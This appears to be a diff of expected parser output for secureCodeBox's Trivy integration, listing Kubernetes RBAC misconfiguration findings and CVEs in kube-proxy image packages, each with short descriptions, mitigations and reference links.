"value": "http://www.openwall.com/lists/oss-security/2022/08/05/2", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=edit", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", + "references": [ { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2022/08/09/1", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8291", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=edit", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", + "references": [ { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-37434", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2116639", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=edit", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2053198", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077431", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV049", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv049", + ], + }, + "category": "Misconfiguration", + "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", + "location": "scb://trivy/?Kind=ClusterRole&Name=edit", + "mitigation": "Remove write permission verbs for resource 'configmaps'", + "name": "Do not allow management of configmaps(ClusterRole 'edit' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081296", + "value": "https://avd.aquasec.com/misconfig/ksv049", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2116639", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV056", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv056", + ], + }, + "category": "Misconfiguration", + "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", + "location": "scb://trivy/?Kind=ClusterRole&Name=edit", + "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", + "name": "Do not allow management of networking resources(ClusterRole 'edit' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37434", + "value": "https://avd.aquasec.com/misconfig/ksv056", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8291.html", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV056", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv056", + ], + }, + "category": "Misconfiguration", + "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", + "location": "scb://trivy/?Kind=ClusterRole&Name=edit", + "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", + "name": "Do not allow management of networking resources(ClusterRole 'edit' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8291", + "value": "https://avd.aquasec.com/misconfig/ksv056", }, { "type": "URL", - "value": "https://github.com/curl/curl/issues/9271", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/edit' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV056", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv056", + ], + }, + "category": "Misconfiguration", + "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", + "location": "scb://trivy/?Kind=ClusterRole&Name=edit", + "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", + "name": "Do not allow management of networking resources(ClusterRole 'edit' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://github.com/ivd38/zlib_overflow", + "value": "https://avd.aquasec.com/misconfig/ksv056", }, { "type": "URL", - "value": "https://github.com/madler/zlib/blob/21767c654d31d2dccdde4330529775c6c5fd5389/zlib.h#L1062-L1063", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/local-path-provisioner-role' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV045", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv045", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits wildcard verb on specific resources", + "location": "scb://trivy/?Kind=ClusterRole&Name=local-path-provisioner-role", + "mitigation": "Create a role which does not permit wildcard verb on specific resources", + "name": "No wildcard verb roles(Role permits wildcard verb on specific resources)", + "references": [ { "type": "URL", - "value": "https://github.com/madler/zlib/commit/eff308af425b67093bab25f80f1ae950166bece1", + "value": "https://avd.aquasec.com/misconfig/ksv045", }, { "type": "URL", - "value": "https://github.com/nodejs/node/blob/75b68c6e4db515f76df73af476eccf382bbcb00a/deps/zlib/inflate.c#L762-L764", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/local-path-provisioner-role' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV056", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv056", + ], + }, + "category": "Misconfiguration", + "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", + "location": "scb://trivy/?Kind=ClusterRole&Name=local-path-provisioner-role", + "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", + "name": "Do not allow management of networking resources(ClusterRole 'local-path-provisioner-role' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-37434.html", + "value": "https://avd.aquasec.com/misconfig/ksv056", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-1095.html", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/securecodebox-manager-role' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv048", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=securecodebox-manager-role", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", + "references": [ { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/09/msg00012.html", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JWN4VE3JQR4O2SOUS5TXNLANRPMHWV4I/", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/securecodebox-manager-role' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV050", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv050", + ], + }, + "category": "Misconfiguration", + "description": "An effective level of access equivalent to cluster-admin should not be provided.", + "location": "scb://trivy/?Kind=ClusterRole&Name=securecodebox-manager-role", + "mitigation": "Remove write permission verbs for resource 'roles' and 'rolebindings'", + "name": "Do not allow management of RBAC resources(ClusterRole 'securecodebox-manager-role' should not have access to resources ["roles", "rolebindings"] for verbs ["create", "update", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NMBOJ77A7T7PQCARMDUK75TE6LLESZ3O/", + "value": "https://avd.aquasec.com/misconfig/ksv050", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PAVPQNCG3XRLCLNSQRM3KAN5ZFMVXVTY/", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/securecodebox-manager-role' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV050", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv050", + ], + }, + "category": "Misconfiguration", + "description": "An effective level of access equivalent to cluster-admin should not be provided.", + "location": "scb://trivy/?Kind=ClusterRole&Name=securecodebox-manager-role", + "mitigation": "Remove write permission verbs for resource 'roles' and 'rolebindings'", + "name": "Do not allow management of RBAC resources(ClusterRole 'securecodebox-manager-role' should not have access to resources ["roles", "rolebindings"] for verbs ["create", "update", "delete", "deletecollection", "impersonate", "*"])", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5U7OTKZSHY2I3ZFJSR2SHFHW72RKGDK/", + "value": "https://avd.aquasec.com/misconfig/ksv050", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YRQAI7H4M4RQZ2IWZUEEXECBE5D56BH2/", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2011-3374", + "installedVersion": "1.8.2.2", + "packageName": "apt", + "references": [ + "https://access.redhat.com/security/cve/cve-2011-3374", + "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", + "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", + "https://seclists.org/fulldisclosure/2011/Sep/221", + "https://security-tracker.debian.org/tracker/CVE-2011-3374", + "https://snyk.io/vuln/SNYK-LINUX-APT-116518", + "https://ubuntu.com/security/CVE-2011-3374", + ], + }, + "category": "Vulnerability", + "description": "It was found that apt-key in apt, all versions, do not correctly validate gpg keys with the master keyring, leading to a potential man-in-the-middle attack.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "It was found that apt-key in apt, all versions, do not correctly valid ...", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-37434", + "value": "https://avd.aquasec.com/nvd/cve-2011-3374", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220901-0005/", + "value": "https://access.redhat.com/security/cve/cve-2011-3374", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230427-0007/", + "value": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213488", + "value": "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213489", + "value": "https://seclists.org/fulldisclosure/2011/Sep/221", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213490", + "value": "https://security-tracker.debian.org/tracker/CVE-2011-3374", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213491", + "value": "https://snyk.io/vuln/SNYK-LINUX-APT-116518", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213493", + "value": "https://ubuntu.com/security/CVE-2011-3374", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-37600", + "installedVersion": "1:2.33.1-0.1", + "packageName": "bsdutils", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-37600", + "https://github.com/karelzak/util-linux/commit/1c9143d0c1f979c3daf10e1c37b5b1e916c22a1c", + "https://github.com/karelzak/util-linux/issues/1395", + "https://nvd.nist.gov/vuln/detail/CVE-2021-37600", + "https://security.netapp.com/advisory/ntap-20210902-0002/", + "https://www.cve.org/CVERecord?id=CVE-2021-37600", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** An integer overflow in util-linux through 2.37.1 can potentially cause a buffer overflow if an attacker were able to use system resources in a way that leads to a large number in the /proc/sysvipc/sem file. NOTE: this is unexploitable in GNU C Library environments, and possibly in all realistic environments.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "util-linux: integer overflow can lead to buffer overflow in get_sem_elements() in sys-utils/ipcutils.c", + "references": [ { "type": "URL", - "value": "https://support.apple.com/kb/HT213494", + "value": "https://avd.aquasec.com/nvd/cve-2021-37600", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5570-1", + "value": "https://access.redhat.com/security/cve/CVE-2021-37600", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5570-2", + "value": "https://github.com/karelzak/util-linux/commit/1c9143d0c1f979c3daf10e1c37b5b1e916c22a1c", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5573-1", + "value": "https://github.com/karelzak/util-linux/issues/1395", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-37434", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-37600", }, { - "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5218", - }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "1:1.2.11.dfsg-2+deb11u1", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-25032", - "installedVersion": "1:1.2.11.dfsg-2", - "packageName": "zlib1g", - "references": [ - "http://seclists.org/fulldisclosure/2022/May/33", - "http://seclists.org/fulldisclosure/2022/May/35", - "http://seclists.org/fulldisclosure/2022/May/38", - "http://www.openwall.com/lists/oss-security/2022/03/25/2", - "http://www.openwall.com/lists/oss-security/2022/03/26/1", - "https://access.redhat.com/errata/RHSA-2022:8420", - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-25032.json", - "https://access.redhat.com/security/cve/CVE-2018-25032", - "https://bugzilla.redhat.com/2067945", - "https://cert-portal.siemens.com/productcert/pdf/ssa-333517.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-25032", - "https://errata.almalinux.org/9/ALSA-2022-8420.html", - "https://github.com/madler/zlib/commit/5c44459c3b28a9bd3283aaceab7c615f8020c531", - "https://github.com/madler/zlib/compare/v1.2.11...v1.2.12", - "https://github.com/madler/zlib/issues/605", - "https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.4", - "https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-v6gp-9mmm-c6p5", - "https://groups.google.com/g/ruby-security-ann/c/vX7qSjsvWis/m/TJWN4oOKBwAJ", - "https://linux.oracle.com/cve/CVE-2018-25032.html", - "https://linux.oracle.com/errata/ELSA-2022-9565.html", - "https://lists.debian.org/debian-lts-announce/2022/04/msg00000.html", - "https://lists.debian.org/debian-lts-announce/2022/05/msg00008.html", - "https://lists.debian.org/debian-lts-announce/2022/09/msg00023.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DCZFIJBJTZ7CL5QXBFKTQ22Q26VINRUF/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DF62MVMH3QUGMBDCB3DY2ERQ6EBHTADB/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZZPTWRYQULAOL3AW7RZJNVZ2UONXCV4/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NS2D2GFPFGOJUL4WQ3DUAY7HF4VWQ77F/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VOKNP2L734AEL47NRYGVZIKEFOUBQY5Y/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XOKFMSNQ5D5WGMALBNBXU3GE442V74WU/", - "https://nvd.nist.gov/vuln/detail/CVE-2018-25032", - "https://security.gentoo.org/glsa/202210-42", - "https://security.netapp.com/advisory/ntap-20220526-0009/", - "https://security.netapp.com/advisory/ntap-20220729-0004/", - "https://support.apple.com/kb/HT213255", - "https://support.apple.com/kb/HT213256", - "https://support.apple.com/kb/HT213257", - "https://ubuntu.com/security/notices/USN-5355-1", - "https://ubuntu.com/security/notices/USN-5355-2", - "https://ubuntu.com/security/notices/USN-5359-1", - "https://ubuntu.com/security/notices/USN-5359-2", - "https://ubuntu.com/security/notices/USN-5739-1", - "https://www.cve.org/CVERecord?id=CVE-2018-25032", - "https://www.debian.org/security/2022/dsa-5111", - "https://www.openwall.com/lists/oss-security/2022/03/24/1", - "https://www.openwall.com/lists/oss-security/2022/03/28/1", - "https://www.openwall.com/lists/oss-security/2022/03/28/3", - "https://www.oracle.com/security-alerts/cpujul2022.html", + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20210902-0002/", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-37600", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-0563", + "installedVersion": "1:2.33.1-0.1", + "packageName": "bsdutils", + "references": [ + "https://access.redhat.com/security/cve/CVE-2022-0563", + "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", + "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + "https://security.netapp.com/advisory/ntap-20220331-0002/", + "https://www.cve.org/CVERecord?id=CVE-2022-0563", ], }, "category": "Vulnerability", - "description": "zlib before 1.2.12 allows memory corruption when deflating (i.e., when compressing) if the input has many distant matches.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "A flaw found in zlib when compressing (not decompressing) certain inputs", + "name": "util-linux: partial disclosure of arbitrary files in chfn and chsh when compiled with libreadline", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-25032", + "value": "https://avd.aquasec.com/nvd/cve-2022-0563", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/May/33", + "value": "https://access.redhat.com/security/cve/CVE-2022-0563", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/May/35", + "value": "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/May/38", + "value": "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2022/03/25/2", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2022/03/26/1", + "value": "https://security.netapp.com/advisory/ntap-20220331-0002/", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8420", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-0563", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2016-2781", + "installedVersion": "8.30-3", + "packageName": "coreutils", + "references": [ + "http://seclists.org/oss-sec/2016/q1/452", + "http://www.openwall.com/lists/oss-security/2016/02/28/2", + "http://www.openwall.com/lists/oss-security/2016/02/28/3", + "https://access.redhat.com/security/cve/CVE-2016-2781", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2781", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://lore.kernel.org/patchwork/patch/793178/", + "https://nvd.nist.gov/vuln/detail/CVE-2016-2781", + "https://www.cve.org/CVERecord?id=CVE-2016-2781", + ], + }, + "category": "Vulnerability", + "description": "chroot in GNU coreutils, when used with --userspec, allows local users to escape to the parent session via a crafted TIOCSTI ioctl call, which pushes characters to the terminal's input buffer.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "coreutils: Non-privileged session can escape to the parent session in chroot", + "references": [ { "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-25032.json", + "value": "https://avd.aquasec.com/nvd/cve-2016-2781", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-25032", + "value": "http://seclists.org/oss-sec/2016/q1/452", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2067945", + "value": "http://www.openwall.com/lists/oss-security/2016/02/28/2", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-333517.pdf", + "value": "http://www.openwall.com/lists/oss-security/2016/02/28/3", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-25032", + "value": "https://access.redhat.com/security/cve/CVE-2016-2781", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8420.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2781", }, { "type": "URL", - "value": "https://github.com/madler/zlib/commit/5c44459c3b28a9bd3283aaceab7c615f8020c531", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://github.com/madler/zlib/compare/v1.2.11...v1.2.12", + "value": "https://lore.kernel.org/patchwork/patch/793178/", }, { "type": "URL", - "value": "https://github.com/madler/zlib/issues/605", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2016-2781", }, { "type": "URL", - "value": "https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.4", + "value": "https://www.cve.org/CVERecord?id=CVE-2016-2781", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2017-18018", + "installedVersion": "8.30-3", + "packageName": "coreutils", + "references": [ + "http://lists.gnu.org/archive/html/coreutils/2017-12/msg00045.html", + "https://access.redhat.com/security/cve/CVE-2017-18018", + "https://nvd.nist.gov/vuln/detail/CVE-2017-18018", + "https://www.cve.org/CVERecord?id=CVE-2017-18018", + ], + }, + "category": "Vulnerability", + "description": "In GNU Coreutils through 8.29, chown-core.c in chown and chgrp does not prevent replacement of a plain file with a symlink during use of the POSIX "-R -L" options, which allows local users to modify the ownership of arbitrary files by leveraging a race condition.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "coreutils: race condition vulnerability in chown and chgrp", + "references": [ { "type": "URL", - "value": "https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-v6gp-9mmm-c6p5", + "value": "https://avd.aquasec.com/nvd/cve-2017-18018", }, { "type": "URL", - "value": "https://groups.google.com/g/ruby-security-ann/c/vX7qSjsvWis/m/TJWN4oOKBwAJ", + "value": "http://lists.gnu.org/archive/html/coreutils/2017-12/msg00045.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2018-25032.html", + "value": "https://access.redhat.com/security/cve/CVE-2017-18018", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9565.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-18018", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/04/msg00000.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-18018", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "1.19.8", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-1664", + "installedVersion": "1.19.7", + "packageName": "dpkg", + "references": [ + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1664", + "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=1f23dddc17f69c9598477098c7fb9936e15fa495", + "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=58814cacee39c4ce9e2cd0e3a3b9b57ad437eff5", + "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=7a6c03cb34d4a09f35df2f10779cbf1b70a5200b", + "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=faa4c92debe45412bfcf8a44f26e827800bb24be", + "https://lists.debian.org/debian-lts-announce/2022/05/msg00033.html", + "https://lists.debian.org/debian-security-announce/2022/msg00115.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-1664", + "https://security.netapp.com/advisory/ntap-20221007-0002/", + "https://ubuntu.com/security/notices/USN-5446-1", + "https://ubuntu.com/security/notices/USN-5446-2", + ], + }, + "category": "Vulnerability", + "description": "Dpkg::Source::Archive in dpkg, the Debian package management system, before version 1.21.8, 1.20.10, 1.19.8, 1.18.26 is prone to a directory 